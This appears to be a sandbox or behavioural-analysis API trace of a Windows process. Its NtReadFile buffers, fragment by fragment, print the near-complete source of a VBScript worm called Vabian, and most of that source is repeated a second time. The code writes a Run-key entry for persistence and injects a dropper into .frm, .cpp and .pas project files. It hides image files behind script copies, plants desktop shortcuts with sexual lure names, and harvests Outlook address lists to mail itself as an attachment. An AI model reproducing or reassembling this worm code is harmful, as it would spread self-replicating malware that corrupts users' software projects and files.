| 19:40:26,483 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e0b4 SectionHandle => 0x00000218 ProcessHandle => 0xffffffff BaseAddress => 0x00fa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | RegOpenKeyExW |
Handle => 0x0000020e Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | RegEnumKeyW |
Handle => 0x0000020e Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | RegOpenKeyExW |
Handle => 0x0000021a Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9} |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | RegQueryValueExW |
Handle => 0x0000021a Data => 32 ValueName => DriveMask |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | RegCloseKey |
Handle => 0x0000021a |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | RegEnumKeyW |
Handle => 0x0000020e Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 1 |
FAILURE | 0x00000103 | |
| 19:40:26,493 | 252 | RegCloseKey |
Handle => 0x0000020e |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0007 SectionHandle => 0x0000020c FileHandle => 0x00000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e528 SectionHandle => 0x0000020c ProcessHandle => 0xffffffff BaseAddress => 0x00fa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e548 SectionHandle => 0x00000218 ProcessHandle => 0xffffffff BaseAddress => 0x00fa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0007 SectionHandle => 0x00000218 FileHandle => 0x00000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e528 SectionHandle => 0x00000218 ProcessHandle => 0xffffffff BaseAddress => 0x00fa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e548 SectionHandle => 0x0000020c ProcessHandle => 0xffffffff BaseAddress => 0x00fa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtCreateFile |
ShareAccess => 3 FileName => C:\windows\backup_vabian.sys DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => Rem VBS.W32.I-worm.Vabian
Rem Script Project Infector [pas,frm,cpp]
Rem By Psychologic aka Puppy
Rem Mailto : Psychologic@hot FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => mail.com
'sending filename
'x=msgbox(Wscript.ScriptName, 0, "Title")
'malware expires....
date2 = #06/01/2018#
date1 = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => Date 'get current date
'x = msgBox(date1,0,"sadd")
'x1 = msgBox(date2,0,"sad1")
'x2 = msgBox(diff,0,"diff")
Do while FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => true
If date1 < date2 Then
Exit Do
End If
WScript.Sleep 1000
Loop
On error resume next
Set executor = wscript.Cr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => eateObject("WScript.Shell")
Set fso = CreateObject("scripting.FileSystemObject")
Set drop = Fso.opentextfile(wscript.scriptful FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => lname, 1)
src = drop.readall
drop.close
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\"
executor.regwrite "HKEY_CLASSES_ROOT FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => \VXFile\DefaultIcon\","C:\PROGRA~1\INTERN~1\iexplore.exe,8"
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\ScriptEngine\","VBScrip FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => t"
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"
executor.regwrite " FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => HKEY_CLASSES_ROOT\VXFile\Shell\Open\Command\","C:\WINDOWS\WScript.exe " & chr(34) & "%1" & chr(34) & " %*"
executor.regwrite "H FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => KEY_CLASSES_ROOT\VXFile\Shell\Play\Command\","C:\WINDOWS\COMMAND\CScript.exe " & chr(34) & "%1" & chr(34) & " %*"
executor.regw FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => rite "HKEY_CLASSES_ROOT\VXFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
executor.regwr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => ite "HKEY_CLASSES_ROOT\.VX\","VXFile"
executor.regwrite "HKEY_CLASSES_ROOT\VX\CLSID\","{B54F3741-5B07-11cf-A4B0-00AA004A55E8}"
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer =>
executor.regwrite "HKEY_CLASSES_ROOT\VX\OLEScript\"
fso.copyfile wscript.scriptfullname,"C:\windows\backup_vabian.sys"
fso. FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => copyfile wscript.scriptfullname,"C:\windows\Vabian.VX"
if fso.FolderExists("C:\Documents and Settings\All Users\Desktop") the FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => n
on error resume next
set shell=wscript.createobject("wscript.shell")
set msc=shell.CreateShortCut("C:\Documents and Sett FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => ings\All Users\Desktop\Sex-Vabian.jpg.lnk")
msc.TargetPath = Shell.ExpandEnvironmentStrings("%windir%\Vabian.VX")
msc.IconLo FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => cation = Shell.ExpandEnvironmentStrings("C:\windows\system32\mspaint.exe, 0")
msc.WindowStyle = 4
msc.Save
end if
if fso FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => .FolderExists("C:\windows\Desktop") then
on error resume next
set shell=wscript.createobject("wscript.shell")
set msc=shel FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => l.CreateShortCut("C:\windows\Desktop\Sex-Children.jpg.lnk")
msc.TargetPath = Shell.ExpandEnvironmentStrings("%windir%\Vabian.V FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => X")
msc.WindowStyle = 4
msc.Save
end if
set opendroperfrm = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
allsour FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => cefrm = ""
oneline = ""
do while opendroperfrm.readline <> "'VabianMarker"
oneline = opendroperfrm.readline
frmformat = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => replace(oneline,chr(34),chr(34)&"&chr(34)&"&chr(34))
fullline = "? #1," & frmformat
allsourcefrm = allsourcefrm & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => fullline
loop
opendroperfrm.close
set opendropercpp = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
allsourcecpp = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => ""
oneline1 = ""
do while opendropercpp.readline <> "'VabianMarker"
oneline1 = ""
oneline1 = opendropercpp.readline
oneb FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => yone = len(oneline1)
for i = 1 to onebyone
read34 = mid(oneline1,i,1)
if read34 = chr(34) then
m = ",34"
else
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => m = ""
end if
all = all & m
next
cppformat1 = replace(oneline1,chr(34),"%c")
cppformat = replace(cppformat1,"\","\\" FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => )
fullline1 = "fprintf(mvbswe," & chr(34) & cppformat & "\n" & chr(34) & all & ");"
allsourcecpp = allsourcecpp & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => fullline1
all = ""
loop
opendropercpp.close
set opendroperpas = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
all FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => sourcepas = ""
oneline2 = ""
do while opendroperpas.readline <> "'VabianMarker"
oneline2 = ""
oneline2 = opendroperpas.rea FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => dline
fullline2 = "writeln (mvbswe,'" & oneline2 & "');"
allsourcepas = allsourcepas & vbcrlf & fullline2
loop
opendroper FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => pas.close
winfold = fso.getspecialfolder(0)
backpath = winfold & "\vabian.vbs"
executor.regwrite "HKLM\SOFTWARE\Microsoft FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => \Windows\CurrentVersion\Run\Vabian", "wscript.exe " & backpath & " %"
fso.copyfile wscript.scriptfullname, backpath
ranpay = i FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => nt(rnd * 9)+1
if ranpay > 5 then
set payload = fso.CreateTextFile("C:\payload.txt")
payload.write "VBS.Vabian" & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => "-------------" & vbcrlf
payload.write "Dear user ... " & vbcrlf & "I just want to tell you something" & vbcrlf
payload.wri FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => te "Your computer has been infected with virus,it called VBS.Vabian" & vbcrlf
payload.write "If you are an Programer, go look FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => at your project check all your frm or cpp or pas files" & vbcrlf
payload.write "Cos that is the victim" & vbcrlf & "Ok I have FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => to go now" & vbcrlf
payload.write "--------------------------------------------------" & vbcrlf
payload.write "Made by Psyc FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => hologic aka Puppy - Indonesian hip-hop singer"
payload.close
executor.run "C:\payload.txt"
end if
Set Drives=fso.drives FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer =>
For Each Drive in Drives
If drive.isready then
FindVictim drive
end If
Next
function FindVictim(path)
on error FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => resume next
Set Folder=fso.getfolder(path)
Set Files = folder.files
For Each File in files
If fso.GetExtensionName(file FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => .path)="frm" then
on error resume next
set readfrmmarker = fso.OpenTextFile(file.path,1, True)
frmmarker = readfrmmarker.r FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => eadline
frmreadall = readfrmmarker.readall
if frmmarker <> "Rem W32.hllp.Vabian" then
set readfrmmarker = fso.CreateTex FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => tFile(file.path, True)
readfrmmarker.write "Rem W32.hllp.Vabian" & vbcrlf & frmreadall & vbcrlf
readfrmmarker.write "Pri FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => vate Sub form_unload(cancel As Integer)" & vbcrlf
readfrmmarker.write "On Error GoTo err:" & vbcrlf
readfrmmarker.write FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => "Open " & chr(34) & "C:\vabian.vbs" & chr(34) & " for output as #1" & vbcrlf
readfrmmarker.write allsourcefrm & vbcrlf & "c FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => lose #1" & vbcrlf & "shell " & chr(34) & "C:\vabian.vbs" & chr(34) & vbcrlf
readfrmmarker.write "msgbox " & chr(34) & "Your FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => Program has been infected by Vabian virus Created by Psychologic" & chr(34) & ",VbInformation," & chr(34) & "W32.VBS.Vabian" & c FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => hr(34)
readfrmmarker.write vbcrlf & "exit sub" & vbcrlf & "err:" & vbcrlf & "End sub" & vbcrlf
readfrmmarker.close
en FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => d if
end if
If fso.GetExtensionName(file.path)="cpp" then
on error resume next
set readcppmarker = fso.OpenTextFile( FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => file.path,1, True)
cppmarker = readcppmarker.readline
cppreadall = readcppmarker.readall
if mid(cppreadall,len(cppreadall FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ),1) = "}" then
cppreadall1 = replace(cppreadall,mid(cppreadall,len(cppreadall),1),"")
end if
if cppmarker <> "// W3 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => 2.hllp.Vabian" then
set readcppmarker = fso.CreateTextFile(file.path, True)
readcppmarker.write "// W32.hllp.Vabian" & v FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => bcrlf & "FILE *Vabian;" & vbcrlf
readcppmarker.write cppreadall & "wormvabian = fopen("&chr(34)&"vabian.vbs"&chr(34)&","&chr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => (34)&"wt"&chr(34)&");" & vbcrlf
readcppmarker.write "if(wormvabian)"&vbcrlf&"{"& allsourcecpp &vbcrlf&"}" & vbcrlf
readc FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ppmarker.write "ShellExecute(NULL, "&chr(34)&"open"&chr(34)&", "&chr(34)&"vabian.vbs"&chr(34)&", NULL, NULL, SW_SHOWNORMAL);" & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => vbcrlf
readcppmarker.write "}" & vbcrlf
readcppmarker.close
end if
end if
If fso.GetExtensionName(file.path)= FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => "pas" then
on error resume next
set readpasmarker = fso.OpenTextFile(file.path,1, True)
pasmarker = readpasmarker.readline FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer =>
pasreadall = readpasmarker.readall
if pasmarker <> "{ W32.hllp.Vabian }" then
set readpasmarker = fso.CreateTextFile(f FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ile.path, True)
readpasmarker.write "{ W32.hllp.Vabian }" & vbcrlf & pasreadall & vbcrlf
readpasmarker.write "procedure FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => " & "TForm1.FormClose(Sender: TObject; var Action: TCloseAction);" & vbcrlf
readpasmarker.write "begin" & vbcrlf & "AssignFi FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => le (Vabian,'C:\Windows\STARTM~1\programs\startup\Vabian.vbs');" & vbcrlf
readpasmarker.write "Rewrite (Vabian);" & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => allsourcepas & vbcrlf & "CloseFile(Vabian);" & vbcrlf
readpasmarker.close
end if
end if
If fso.GetExtensionName(fil FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => e.path)="bmp" or fso.GetExtensionName(file.path)="jpg" or fso.GetExtensionName(file.path)="gif" or fso.GetExtensionName(file.pat FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => h)="ico" then
For i = 1 To 8
fvar = Chr(Int(22 * Rnd) + 97)
varall = fvar & varall
Next
on error resume next
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => bathelp = file.path & ".bat"
Set dropper = Fso.Createtextfile(bathelp, True)
dropper.writeline "Attrib +h " & file.path
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer =>
dropper.Close
executor.run bathelp
fso.Deletefile bathelp
vbscopy = file.path & ".VX"
Set dropper2 = Fso.Createte FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => xtfile(vbscopy, True)
dropper2.write "Set " & varall & " = wscript.CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ")" FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => & vbcrlf & "Sucke.run " & chr(34) & file.path & chr(34) & vbcrlf
dropper2.write scr
dropper2.Close
end if
next
Se FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => t Subfolders = folder.SubFolders
For Each Subfolder in Subfolders
FindVictim Subfolder.path
Next
end function
Set FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => spreader =CreateObject("Outlook.Application")
Set spreader =spreader.GetNameSpace("MAPI")
For Each C In spreader.AddressLists
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer =>
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
Set spreader=C.AddressEntries(D)
Set spreader=spreader FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => .CreateItem(0)
spreader.To=aaaaaaaa.Address
spreader.Subject="Vabian Milenium"
spreader.Body="Stop asking,just checkout the a FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x001ca000 |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ttachment"
spreader.Attachments.Add(Fso.GetSpecialFolder(0)&"\Vabian.vbs")
spreader.DeleteAfterSubmit=True
'//If spreader.To FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => <> "" Then
'//spreader.Send
'//End If
Next
End If
Next
'VabianMarker FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => FileHandle => 0x0000020c |
FAILURE | 0xc0000011 | |
| 19:40:26,503 | 252 | NtCreateFile |
ShareAccess => 3 FileName => C:\windows\backup_vabian.sys DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => Rem VBS.W32.I-worm.Vabian
Rem Script Project Infector [pas,frm,cpp]
Rem By Psychologic aka Puppy
Rem Mailto : Psychologic@hot FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => mail.com
'sending filename
'x=msgbox(Wscript.ScriptName, 0, "Title")
'malware expires....
date2 = #06/01/2018#
date1 = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => Date 'get current date
'x = msgBox(date1,0,"sadd")
'x1 = msgBox(date2,0,"sad1")
'x2 = msgBox(diff,0,"diff")
Do while FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => true
If date1 < date2 Then
Exit Do
End If
WScript.Sleep 1000
Loop
On error resume next
Set executor = wscript.Cr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => eateObject("WScript.Shell")
Set fso = CreateObject("scripting.FileSystemObject")
Set drop = Fso.opentextfile(wscript.scriptful FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => lname, 1)
src = drop.readall
drop.close
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\"
executor.regwrite "HKEY_CLASSES_ROOT FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => \VXFile\DefaultIcon\","C:\PROGRA~1\INTERN~1\iexplore.exe,8"
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\ScriptEngine\","VBScrip FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => t"
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"
executor.regwrite " FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => HKEY_CLASSES_ROOT\VXFile\Shell\Open\Command\","C:\WINDOWS\WScript.exe " & chr(34) & "%1" & chr(34) & " %*"
executor.regwrite "H FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => KEY_CLASSES_ROOT\VXFile\Shell\Play\Command\","C:\WINDOWS\COMMAND\CScript.exe " & chr(34) & "%1" & chr(34) & " %*"
executor.regw FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => rite "HKEY_CLASSES_ROOT\VXFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
executor.regwr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ite "HKEY_CLASSES_ROOT\.VX\","VXFile"
executor.regwrite "HKEY_CLASSES_ROOT\VX\CLSID\","{B54F3741-5B07-11cf-A4B0-00AA004A55E8}"
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer =>
executor.regwrite "HKEY_CLASSES_ROOT\VX\OLEScript\"
fso.copyfile wscript.scriptfullname,"C:\windows\backup_vabian.sys"
fso. FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => copyfile wscript.scriptfullname,"C:\windows\Vabian.VX"
if fso.FolderExists("C:\Documents and Settings\All Users\Desktop") the FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => n
on error resume next
set shell=wscript.createobject("wscript.shell")
set msc=shell.CreateShortCut("C:\Documents and Sett FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ings\All Users\Desktop\Sex-Vabian.jpg.lnk")
msc.TargetPath = Shell.ExpandEnvironmentStrings("%windir%\Vabian.VX")
msc.IconLo FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => cation = Shell.ExpandEnvironmentStrings("C:\windows\system32\mspaint.exe, 0")
msc.WindowStyle = 4
msc.Save
end if
if fso FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => .FolderExists("C:\windows\Desktop") then
on error resume next
set shell=wscript.createobject("wscript.shell")
set msc=shel FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => l.CreateShortCut("C:\windows\Desktop\Sex-Children.jpg.lnk")
msc.TargetPath = Shell.ExpandEnvironmentStrings("%windir%\Vabian.V FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => X")
msc.WindowStyle = 4
msc.Save
end if
set opendroperfrm = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
allsour FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => cefrm = ""
oneline = ""
do while opendroperfrm.readline <> "'VabianMarker"
oneline = opendroperfrm.readline
frmformat = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => replace(oneline,chr(34),chr(34)&"&chr(34)&"&chr(34))
fullline = "? #1," & frmformat
allsourcefrm = allsourcefrm & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => fullline
loop
opendroperfrm.close
set opendropercpp = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
allsourcecpp = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ""
oneline1 = ""
do while opendropercpp.readline <> "'VabianMarker"
oneline1 = ""
oneline1 = opendropercpp.readline
oneb FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => yone = len(oneline1)
for i = 1 to onebyone
read34 = mid(oneline1,i,1)
if read34 = chr(34) then
m = ",34"
else
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => m = ""
end if
all = all & m
next
cppformat1 = replace(oneline1,chr(34),"%c")
cppformat = replace(cppformat1,"\","\\" FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => )
fullline1 = "fprintf(mvbswe," & chr(34) & cppformat & "\n" & chr(34) & all & ");"
allsourcecpp = allsourcecpp & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => fullline1
all = ""
loop
opendropercpp.close
set opendroperpas = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
all FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => sourcepas = ""
oneline2 = ""
do while opendroperpas.readline <> "'VabianMarker"
oneline2 = ""
oneline2 = opendroperpas.rea FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => dline
fullline2 = "writeln (mvbswe,'" & oneline2 & "');"
allsourcepas = allsourcepas & vbcrlf & fullline2
loop
opendroper FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => pas.close
winfold = fso.getspecialfolder(0)
backpath = winfold & "\vabian.vbs"
executor.regwrite "HKLM\SOFTWARE\Microsoft FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
